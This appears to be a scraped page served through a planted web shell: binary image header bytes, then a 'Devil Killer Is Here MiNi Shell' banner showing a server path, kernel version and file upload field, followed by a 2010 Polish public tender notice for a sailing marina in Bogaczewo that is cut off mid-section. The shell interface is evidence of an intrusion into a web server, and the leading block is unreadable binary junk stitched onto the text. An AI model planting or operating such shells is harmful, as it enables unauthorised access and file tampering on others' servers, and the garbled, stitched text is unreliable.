JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100709/203444-N-2010.html

<p class="kh_header"><b>Morąg: Zagospodarowanie brzegów jeziora Narie - budowa przystani żeglarskiej w Bogaczewie</b><br>
<b>Numer ogłoszenia: 203444 - 2010; data zamieszczenia: 09.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie brzegów jeziora Narie - budowa przystani żeglarskiej w Bogaczewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa przystani żeglarskiej w Bogaczewie. Inwestycja polega na wykonaniu zagospodarowaniu terenu obecnej przystani żeglarskiej polegającemu na:
I. budowie budynku gospodarczego 
II. utwardzeniu placu manewrowego i parkingu 
III. budowie pomostów pływających 
IV. budowie slipu do wodowania i wyciągania jednostek pływających z wody 
V. wykonaniu przyłącza wodociągowego i kanalizacji sanitarnej 
VI. wykonaniu instalacji elektrycznej i oświetlenia
 
Powierzchnia obiektów:     
-    powierzchnia dróg   901,1 m 2         
-    powierzchnia chodnika   120,8m 2  
-    powierzchnia budynku gospodarczego  100 m 2              
-    długość pomostu  2x 47m 

I. Budynek gospodarczy
Budynek gospodarczy z pomieszczeniem gospodarczym, magazynem, hangarem , WC  i   tarasem .  Całość budynku jest nie podpiwniczona . Budynek jest zasilany w energię elektryczną i wodę . Odprowadzenie ścieków do sieci kanalizacyjnej przez przepompownię. Dach o spadkach  30°  i 35°. Wysokość kalenicy 4,60m. 

KUBATURA BRUTTO  370 m 3  
POWIERZCHNIA ZABUDOWY  100 m 2  
POWIERZCHNIA WEWNĘTRZNA BUDYNKU  55 m 2 
ILOŚĆ KONDYGNACJI  1 
SZEROKOŚĆ  x DŁUGOŚĆ  11,8 x 5,5m 
WYSOKOŚĆ BUDYNKU  4,60m 
Pomieszczenie gospodarcze zarządcy przystani winno być wyposażone w: 
- stoły drewniane o wymiarach blatu 80x120  o wys. 75cm -  4szt. 
- krzesła (miękkie tapicerowane oparcie, wytrzymała i metalowa konstrukcja ramy- chromowana lub lakierowana) -  20 szt. 
- szafa (wykonanie: płyta meblowa laminowana; wymiary - wysokość do 185 cm, głębokość 60cm, szerokość do 100cm_ - szt.1
- biurko (rozmiar do: (wysokość/szerokość/głębokość): 75cm/110cm/56cm. płyta meblowa laminowana) - 1 szt 
- kanapa z pojemnikiem na pościel (powierzchnia spania do 120x200cm, system rozkładania klik-klak, funkcja spania) - szt. 1
Meble w kolorach drewna jasnego , blat z laminatu . 
Hangar należy wyposażyć w stół warsztatowy (blat wykonany z bukowej płyty spoinowej o grubości 40mm, krawędzie zaokrąglone, powierzchnia robocza dł. x sz. 1200-1500-1700-2000x 685/80 z szafką i szufladami na narzędzia i imadłem przymocowanym do blatu stołu - szt.1 

Dodatkowo:
- przedłużacz elektryczny zwijany długości 25m - szt.1
- stoły ogrodowe z drewna sosnowego o długości do 140cm - szt.3
- ławy ogrodowe z drewna sosnowego o długości do 140cm - szt.6

II. Drogi manewrowe i parkingi

Komunikację i postój ma terenie Przystani żeglarskiej zapewni nawierzchnia  utwardzająca projektowany teren. 
 W skład dróg wchodzi: 
 1. Plac manewrowy o powierzchni 901,1m 2     -  geokrata grubości 5cm 
 2. Chodnik  120,8m 2     -  kostka betonowa grubości 6cm 

Ad.1 Plac manewrowy służy komunikacji na terenie przystani , jako dojazd do parkingu na 18 stanowisk postojowych i dojazd do slipu . Przyjęto stanowiska postojowe o wymiarach 2,5x4,5m. 
   
Przyjęto nawierzchnię o następującej budowie : 
-   Nawierzchnia z płyt trawnikowych (geokrata) o grubości 5cm , komórki zasypane 
mieszanką grysu i humusu  w stosunku 1:1. 
-   Warstwa wyrównawcza z mieszanki piasku i żwiru gr. 5cm 
-   Warstwa filtracyjna z  geowłókniny 
-   Podbudowa z tłucznia kamiennego o uziarnieniu 0-32,5 mm grubości 20cm 
Krawędzie placu obramować obrzeżem 30x8 betonowym na ławie żwirowej .

Chodniki
Chodnik łączy oba pomosty pływające . Szerokość chodnika 2m. Krawędzie obramować obrzeżem 30x8 na ławie żwirowej. 
 
Przyjęto konstrukcję o następującej budowie: 
- Nawierzchnia z kostki betonowej gr. 6cm 
- warstwa wyrównawcza z mieszanki cem. piask. 2-3cm 
- podbudowa z piasku grubości 15cm. 
Warstwa podsypki o grubości 15cm powinna być wykonana z piasku, albo żwiru.

Maszt flagowy
We wskazanym na planie zagospodarowania pokazano miejsce umieszczenia masztu flagowego. Maszt z profilu duraluminiowego 96x75 długości 8m ,ścianki min. 2mm. Maszt należy osadzić cęgach wykonanych z blachy nierdzewnej grubości 5mm spawanej w osłonie argonowej. Cęgi umocować kotwami w fundamencie z betonu B-15 o wymiarach 0,5x0,5x1m. Maszt uchwycić dwoma śrubami nierdzewnymi fi 12mm . Na maszcie umocować gafel na przegubie pracującym w płaszczyźnie pionowej masztu , podnoszony fałem z liny miękkiej  fi8mm. 
Na dolnej części masztu umocować cztery knagi do fałów. Maszt usztywnić trzema wantami rozstawionymi pod kątami 120o. Wantowniki ze stali nierdzewnej 300x50 osadzić w betonie B15 0,25x0,25x0,4m. Regulację i dociągnięcie want przy pomocy ściągaczy nierdzewnych fi 10mm. 

Ognisko 
We wskazanym miejscu wykonać krąg o średnicy 2 m z kamieni polnych , przeznaczony na ognisko . Wokół ogniska ustawić ławki z półkloców z drewna liściastego twardego , na drewnianych podporach z pni, zakonserwowanych emulsją asfaltową . 

III. Pomosty pływające 
Projekt obejmuje wykonanie dwóch pomostów pływających o drewnianych pokładach na betonowych pływakach. Pokład konstrukcji drewnianej (sortowana sosna, impregnowana ciśnieniowo), deski  pokładu 28x 120 mm na 4 podłużnicach o przekroju 200x75 mm. Elementy pokładu są sztywno połączone z 7 pływakami. Ciągła, szkieletowa konstrukcja sprawia, że pomost jest mocny i stabilny. Betonowe pływaki typu M200 o wymiarach 2000x2380x700 mm o ciężarze 1180 kg i wyporności 2150 kg wykonane są z hydrotechnicznego siatkobetonu B45, wypełnionego styropianem. Zbrojenie i części metalowe to stal cynkowana ogniowo. (Rys. 2, 3, 4) 
Dane techniczne pomostu: 
   Długość całkowita pomostu 40,50 m 
   Ilość pływaków 7 szt. 
   Szerokość pomostu 2,40 m 
   Powierzchnia pomostu 97,2 m2
   Trap dojściowy na pomost konstrukcji drewnianej bez relingów: 
-    szerokość 1,5 m 
-    długość 5,0 m 
Umocnienie brzegowe - skrzynia żelbetowa (prefabrykat) o wymiarach 1500x2000x850mm, grubość ścianki  250 mm Kotwienie pomostu na łańcuchach (stalowych, śr. 16 mm, ocynk ogniowy) 
-    do 18 m od brzegu kotwienie przy użyciu 4 pali kotwicznych śr 68 mm, zakończonych świdrem o śr. 89 mm 
-    dalsza część na 6 martwych kotwicach betonowych o wymiarach 750 x1300x500mm o wadze po 1200 kg (prefabrykat) 
   
Cumowanie jachtów: 
-    dystansowe odnogi cumownicze typ F600 o długości 6 m, wyporność 75 kg - 20 szt. 
-    knagi typ 2 AL. podstawa 60x220, wys. 95 mm - 25szt 
-    wolna burtka (poziom pokładu - poziom L. W.)- 56 cm 
   
Wyposażenie portowe: 
-    na końcu każdego z pomostów zamontowana będzie drabinka bezpieczeństwa typ 2 sześciostopniowa i stanowisko ratownicze wyposażone w koło ratunkowe i zasobnik z linką 30 m. 
Pomost nie wymaga ściągania na lad na okres zimy. Pływaki siatkowo betonowe są odporne na niszczące działanie fal, wiatru i lodu nawet w najsurowszych warunkach klimatycznych. 

IV. Slip do wodowania i wyciągania jednostek pływających z wody 
Budowa slipu polegać będzie na ułożeniu płyt drogowych żelbetowych o wymiarach 0,20x1,00x4,00 m na podsypce grubości 5 cm w wodzie i 10 cm na ladzie wg rys. 5 i 6. 
Dane techniczne slipu: 
   Długość całkowita slipu 24,0m 
-    lądowa 14,0 m 
-    podwodna 10,0 m 
   Szerokość slipu 4,0 m  
   Powierzchnia slipu 96 m2
   Maksymalna głębokość od lustra wody średniej 1,00 m 
   Spadek w części podwodnej 8,5 %, naziemnej 9,28 % 
Do sprawnego i zgodnego z ich przeznaczeniem, funkcjonowania pomostów i slipu należy jezioro, w miejscu ich budowy, przystosować do planowanych zamierzeń. Wycięta będzie istniejąca kępa trzcin na powierzchni ok. 180 m2 i odmulone dno jeziora w obrębie budowanych pomostów warstwą od 0,2m do 0,5 m. Powierzchnie wycinki trzcin i odmulenia oznaczono na planie sytuacyjnym (rys.1). Powyższe roboty wykonane będą koparką gąsiennicową chwytakową, pracującą na materacach. Urobek będzie przemieszczony z jednokrotnym przerzutem na brzeg jeziora i odwieziony koparką ciągnikową z pojemną łyżką na odległość 60 m do zadolenia (bagna), za placem projektowanej przystani. 

V. Przyłącze wodociągowe i kanalizacji sanitarnej 
Projektowane  przyłącze  wodociągowe  z  rur  PE  -  HD  śr  32  mm  SD  R17  włączone będzie  do  sieci  wodociągowej  wodociągu  zbiorowego  wsi  Bogaczewo  PCV  śr.  110  mm,   5  m  przed  istniejącym  przyłączem  do  budynku  mieszkalnego  na  dz.  26/29  (Rys.  1),  za pomocą  nawiertki  i  zasuwy  śr.  50  mm.  Długość  przyłącza  PE  32  wyniesie  76  m.  Przed wejściem do budynku (4m) pobudowana będzie studzienka wodomierzowa śr 1,0 m h=2,0 m (Rys. 2). W studzience zamontowany będzie wodomierz JSW śr 15mm, 2 zawory przelotowe śr. 25mm z kurkami spustowymi (do spuszczania wody na okres zimowy) i punkt czerpalny wody   z   zaworem   śr.   25mm   ze   złączką   do   węża.   Istniejący   hydrant   p.   pożarowy, zlokalizowany  na  trasie  projektowanej  drogi  do  slipu,  należy  zdemontować  i  zamontować ponownie  poza  krawędzią  projektowanej  drogi. W  budynku  gospodarczym  (nr  5  na  rys.  1) będzie sanitariat. Instalacje wewnętrzne w budynku gospodarczym z rur PE  śr. 15 i 20mm doprowadzą wodę do sanitariatu i zasilą spłuczkę, umywalkę i prysznic (rys. 4). 
W   pomieszczeniu    sanitariatu    zamontowane    będą:    sedes,    umywalka,    kabina prysznicowa.  Ścieki  sanitarne  z  sanitariatu  skierowane  będą  rurociągiem  PVC  śr.  160  mm typu N L=5 m do przepompowni przydomowej PD 1. Z przepompowni ścieki będą tłoczone rurociągiem  PE-HD  śr  50  mm  SDR  17,  L=79  m  i  włączone  do  istniejącej  sieci  tłocznej średnicy  40mm  z  przepompowni  Pd  budynku  na  dz.  nr  26/29.  Instalacje  wewnętrzne kanalizacji  sanitarnej    z  rur  PVC  śr  150,  100  i  50  mm  (wg  Rys.  5)  odprowadzą  ścieki    z sedesu umywalki i kabiny prysznicowej. 
Przepompownia  przydomowa  będzie  z  polietylenu  z  komorą  o  średnicy  800mm zgodna     z     PN-EN-12050-1.001.

VI. instalacja elektryczna i oświetlenie

Zakres robót obejmuje:
- instalacje elektryczne wnętrzowe,
- zasilanie przepompowni ścieków,
- zasilanie szafek z gniazdami wtyczkowymi  S-1 i S-2,
 - instalację ochrony od przepięć atmosferycznych i łączeniowych,
 - instalację ochrony od porażeń prądem elektrycznym,
 - instalację piorunochronną,
 - instalację oświetlenia zewnętrznego terenu,

Instalacja oświetleniowa
Całość instalacji oświetleniowej zaprojektowano przewodami typu YDY  3-żyłowymi, z żyłą ochronną  PE,  o przekrojach podanych na schemacie zasilania i planie instalacji układanymi w tynku i pod tynk, w RL n/d  i n/d w k-k..
Wykaz opraw znajduje się na planie instalacji oświetleniowej parteru rys. Nr E-4.  W całości budynku  stosować osprzęt szczelny. Instalację oświetleniową układaną na ścianach o konstrukcji drewnianej szkieletowej wykonać w rurkach izolacyjnych, niepalnych układanych pod płytami z suchego tynku z osprzętem do pustych ścian.
Na ścianach drewnianych stosować osprzęt szczelny układany na drewnie na podkładach z blachy ocynkowanej a przewody na tych ścianach układa w niepalnych korytkach krytych. Doprowadzenie przewodów do opraw oświetleniowych na drewnianych sufitach wykonać w rurkach lub korytkach krytych izolacyjnych niepalnych. Na stropach palnych wolno mocować wyłącznie oprawy oznaczone symbolem F. Łączniki instalować na wysokości  1,2m  nad posadzką.

Instalacja gniazd wtyczkowych
Całość instalacji gniazd wtyczkowych zaprojektowano przewodami typu YDY  3-żyłowymi. z żyłą ochronną PE, o przekrojach podanych na schemacie zasilania i planie instalacji układanymi w tynku, w RL n/d i n/d w k-k. W  całości budynku stosowa osprzęt szczelny. Instalację gniazd wtyczkowych układaną na ścianach o konstrukcji drewnianej szkieletowej wykonać w rurkach izolacyjnych niepalnych, układanych pod płytami z suchego tynku z osprzętem do pustych ścian. Na ścianach drewnianych stosować osprzęt szczelny układany na drewnie na podkładach z blachy ocynkowanej a przewody na tych ścianach układa w niepalnych korytkach krytych. Gniazda wtyczkowe w hangarze instalować na wysokości 0,95m od posadzki, w bosmanówce 0,95m, w łazience na wysokości od podłogi.

Instalacja zasilania gniazd wtyczkowych przy pomostach
Przy pomostach zaprojektowano dwie szafki z gniazdami wtyczkowymi do zasilania przenośnych urządzeń elektrycznych do wykonywaniadrobnych prac przy sprzęcie żeglarskim.  Szafki S-1 i S-2 zamontować jako typowe. Wykonać uziemienia szafek za pomocą prętów Galmar. Oporność uziomów nie może przekroczyć 10 Om.  Linię zasilającą do S-1 i S-2 wykonać kablem YKY3x6,0mm2 wyprowadzonym z tablicy rozdzielczej TR i układanym w ziemi wg pkt. 4 opisu technicznego.

Instalacja zasilania przepompowni ścieków
Przy budynku gospodarczym zaprojektowano przepompownie ścieków. Linię zasilającą do szafki rozdzielczej przepompowni ścieków SP wykonać kablem YKY3x6,0mm2  wyprowadzonym z tablicy rozdzielczej TR i układanym w ziemi wg  pkt. 4 niniejszego opisu technicznego. Szafka sterownicza SP wchodzi w skład wyposażenia przepompowni.

Instalacja ochrony od przepięć atmosferycznych i łączeniowych
W tablicy rozdzielczej TR  zaprojektowano II stopień ochrony od przepięć atmosferycznych  i  łączeniowych.  Ochronniki przystosowane są do montażu na listwie zatrzaskowej. 

Ochrona od porażeń prądem elektrycznym
Jako system ochrony od porażeń prądem  elektrycznym należy zastosować szybkie wyłączenie prądu za  pomocą wyłączników przeciwporażeniowych, różnicowoprądowych odpowiednio FI468P 25A,  delta I< 30mA  zamontowanych w tablicy rozdzielczej  TR zgodnie ze schematem.

Instalacja odgromowa
Jako zwód wykorzystać ocynkowaną blachę pokrycia dachowego. Wykonać mostki połączeniowe za pomocą pręta stalowego-ocynkowanego FeZn fi 6mm. Przewody odprowadzające  Fe/Zn fi 6mm układać na uchwytach na ścianach budynku. Zaciski kontrolne montować na wysokości  0,8m. Uziom otokowy wykonać bednarką  Fe/Zn25x4mm układaną w ziemi na głębokości 0,6m w odległości min. 1,0 od fundamentów budynku.

Zasilenie i sterowanie oświetleniem terenu
Zza licznika w szafce złączowo-pomiarowej SZP ,wykonanej wg odrębnego opracowania ENERGA OPERATOR S.A., wykonać linię zasilającą do szafki sterowniczej oświetleniem terenu SOU-2/W/F, kablem YKY3x10mm2 .  Z szafki sterowania oświetleniem terenu SOU-2/W/F wykonać obwód kablowy oświetleniowy YKY3x6,0mm2 do słupów  Nr 1 i 2 przy pomostach. Sterowanie oświetleniem terenu odbywa się będzie za pomocą zegaraastronomicznego umieszczonego w szafce sterowniczej SOU-2/W/F. 

Budowa obwodu oświetlenia terenu
Budowę obwodu oświetlenia terenu  zaprojektowano kablem ziemnym YKY3x6,0mm2  wyprowadzonym z szafki oświetlenia terenu zlokalizowanej obok przewidywanego miejsca posadowienia szafki złączowo-pomiarowej SPZ wykonanej przez Dystrybutora energii elektrycznej, do skrzynek bezpiecznikowych w słupach Nr 1 i 2.                                                                                   W miejscach wskazanych na rys. nr E-1 ustawić stalowe ocynkowane, słupy oświetleniowe typu  CITY 9 2x2m  9 m montowane na prefabrykowanych fundamentach typu F-120. Na słupach zamontować dwuramienne 2m wysięgniki z oprawami oświetleniowymi z lampami sodowymi 100W.  Wnęki latarń wyposażyć w tabliczki zaciskowo - bezpiecznikowe  TBS 2-4/4A.  Ze skrzynki bezpiecznikowej  w słupie oświetleniowym wykonać zasilanie oprawy przewodami 2x YDY3x2,5mm2. Lampy oświetleniowe zabezpieczyć w skrzynkach bezpiecznikowych bezpiecznikami  BiWts 4A. W słupach 1 i 2  przewód PEN i słup dodatkowo uziemić wykonując uziom pionowy głębinowy. Oporność uziomu nie może przekroczyć 10 Om.
Budowa obwodu kablowego oświetlenia terenu
     Obwód oświetlenia terenu wykona kablem ziemnym YKY3x6,0mm2 wg punktu 4 opisu technicznego.
Uwaga:
Roboty na wodzie należy wykonać do końca września zgodnie z warunkiem nr 2  Decyzji Regionalnego Dyrektora Ochrony Środowiska (załączonym do SIWZ) z zastrzeżeniem opisanym w punkcie nr 3 tj. wycinka trzciny musi zostać wykonana po 15 sierpnia.
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.24.11.00-9, 45.23.32.00-1, 45.23.21.50-8, 45.33.00.00-9, 45.31.00.00-3, 45.32.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 15 000.00 PLN (słownie: piętnaście tysięcy 00/100 PLN).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności zostanie uznany za spełniony jeżeli Wykonawca wraz z ofertą złoży zgodnie z załączonym do SIWZ formularzem - oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP- Załącznik nr 1           
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na budowie przystani wodnej z infrastrukturą towarzyszącą o wartości nie mniejszej niż  400 000,00 złotych z podaniem jej rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - wg wzoru Załącznika Nr 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - Załącznika nr 2.
Dysponowanie osobą, której zamierza powierzyć funkcję kierownika budowy do:
- kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych i elektrycznych bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówie?nia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż 500 000,00zł.
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
